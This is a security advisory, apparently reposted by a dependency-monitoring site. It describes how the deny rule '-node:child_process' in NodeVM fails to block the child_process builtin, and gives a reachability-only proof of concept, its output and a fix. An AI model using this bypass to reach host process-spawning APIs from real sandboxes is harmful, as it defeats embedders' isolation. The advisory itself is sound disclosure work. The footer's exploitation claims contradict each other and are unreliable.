Know every vulnerabilitybefore it knows you.
DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.
GHSA-8686-vhfx-7r3j
Summary
NodeVM normalizes node:-prefixed builtin specifiers during require() resolution, but it does not normalize user-provided negative builtin entries in wildcard policy.
As a result, this configuration:
new NodeVM({
require: {
builtin: ['*', '-node:child_process']
}
});
does not deny the canonical child_process builtin. Sandboxed code can require both child_process and node:child_process, and receives the host module with process-spawning APIs such as execSync and spawn.
The safe proof below only checks module and function reachability. It does not execute any OS command.
Affected Mode
NodeVM.
Affected Configuration
new NodeVM({
require: {
builtin: ['*', '-node:child_process']
}
});
This affects users who deny builtins using their node:-prefixed spelling, expecting -node:child_process to deny require('node:child_process') and require('child_process').
Affected Files / Functions
lib/builtin.jsmakeBuiltinsFromLegacyOptions- wildcard builtin expansion
- exact negative entry check:
builtins.indexOf(\-${name}`)` addDefaultBuiltin
lib/resolver.jsResolver.resolve
lib/setup-node-sandbox.jsrequireImplnode:prefix stripping before builtin load
Root Cause
lib/setup-node-sandbox.js strips the node: prefix from resolved builtin filenames before loading the builtin:
if (localStringPrototypeStartsWith(filename, 'node:')) {
id = localStringPrototypeSlice(filename, 5);
let nmod = cacheBuiltins[id];
if (!nmod) {
nmod = loadBuiltinModule(id);
if (!nmod) throw new VMError(`Cannot find module '${filename}'`, 'ENOTFOUND');
cacheBuiltins[id] = nmod;
}
return nmod;
}
But lib/builtin.js checks wildcard negative entries by exact string match against the names in BUILTIN_MODULES:
if (builtins.indexOf(`-${name}`) === -1) {
addDefaultBuiltin(res, name, hostRequire);
}
BUILTIN_MODULES contains the canonical name child_process, not node:child_process. Therefore -node:child_process does not exclude child_process, and addDefaultBuiltin() registers the host builtin.
Security Boundary Crossed
Sandboxed code reaches a host builtin that the embedder attempted to deny.
Boundary crossed:
- sandbox -> host
child_processbuiltin - sandbox -> host process-spawning function references
Impact
Confirmed impact:
require('child_process')succeeds inside the sandbox.require('node:child_process')succeeds inside the sandbox.- The returned module exposes
execSyncandspawnas functions.
Worst confirmed impact is access to host process-spawning APIs. The proof does not execute any command.
The proof does not execute a command, but it confirms access to the host child_process module and its process-spawning APIs. For untrusted sandbox code, this is equivalent to command execution capability.
Safe Local Reproduction
Tested on Node.js v24.14.0.
This proof only checks whether the module and dangerous functions are reachable. It does not spawn a process and does not run OS commands.
'use strict';
const { NodeVM } = require('./');
function probe(builtin) {
const vm = new NodeVM({
require: {
builtin
}
});
return vm.run(`
const out = {};
for (const spec of ['child_process', 'node:child_process']) {
try {
const cp = require(spec);
out[spec] = {
loaded: true,
execSyncType: typeof cp.execSync,
spawnType: typeof cp.spawn,
moduleToStringTag: Object.prototype.toString.call(cp)
};
} catch (e) {
out[spec] = {
loaded: false,
name: e && e.name,
code: e && e.code,
message: e && e.message
};
}
}
module.exports = out;
`);
}
console.log(JSON.stringify({
nodeVersion: process.version,
denyNodePrefixed: probe(['*', '-node:child_process']),
denyCanonical: probe(['*', '-child_process'])
}, null, 2));
Observed result:
{
"nodeVersion": "v24.14.0",
"denyNodePrefixed": {
"child_process": {
"loaded": true,
"execSyncType": "function",
"spawnType": "function",
"moduleToStringTag": "[object Object]"
},
"node:child_process": {
"loaded": true,
"execSyncType": "function",
"spawnType": "function",
"moduleToStringTag": "[object Object]"
}
},
"denyCanonical": {
"child_process": {
"loaded": false,
"name": "VMError",
"code": "ENOTFOUND",
"message": "Cannot find module 'child_process'"
},
"node:child_process": {
"loaded": false,
"name": "VMError",
"code": "ENOTFOUND",
"message": "Cannot find module 'node:child_process'"
}
}
}
Expected Secure Behavior
-node:child_process and -child_process should be equivalent.
If either spelling is denied, both of these should fail:
require('child_process')
require('node:child_process')
Suggested Fix
-
Canonicalize builtin names before allow/deny comparison:
- Strip
node:from user-provided builtin entries. - Preserve whether an entry is negative (
-...) before canonicalizing. - Store and compare one canonical builtin key.
- Strip
-
Apply the same normalization to:
- wildcard negative entries
- explicit allowlist entries
- object-form builtin entries
- mock/override keys if they are intended to support
node:spelling
-
Add regression tests:
builtin: ['*', '-node:child_process']blockschild_process.builtin: ['*', '-node:child_process']blocksnode:child_process.builtin: ['*', '-node:fs']blocksfsandnode:fs.builtin: ['*', '-node:fs/promises']and-fs/promisesbehave consistently.- Canonical dangerous builtins remain denied even if explicitly requested with
node:spelling.
Upload your own SBOM in CycloneDX 1.6 or higher (JSON) directly here to check your vulnerabilities.
Drag and drop some file here, or click to select
The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker needs basic access or low-level privileges. No user interaction is needed for the attacker to exploit this vulnerability. The vulnerability can affect other systems as well, not just the initial system. There is a high impact on the confidentiality of the information. There is a high impact on the integrity of the data. There is a high impact on the availability of the system.
Active exploitation in the wild has been confirmed. Immediate patching or mitigation is required.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
Browse More
Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.
Checkout DevGuard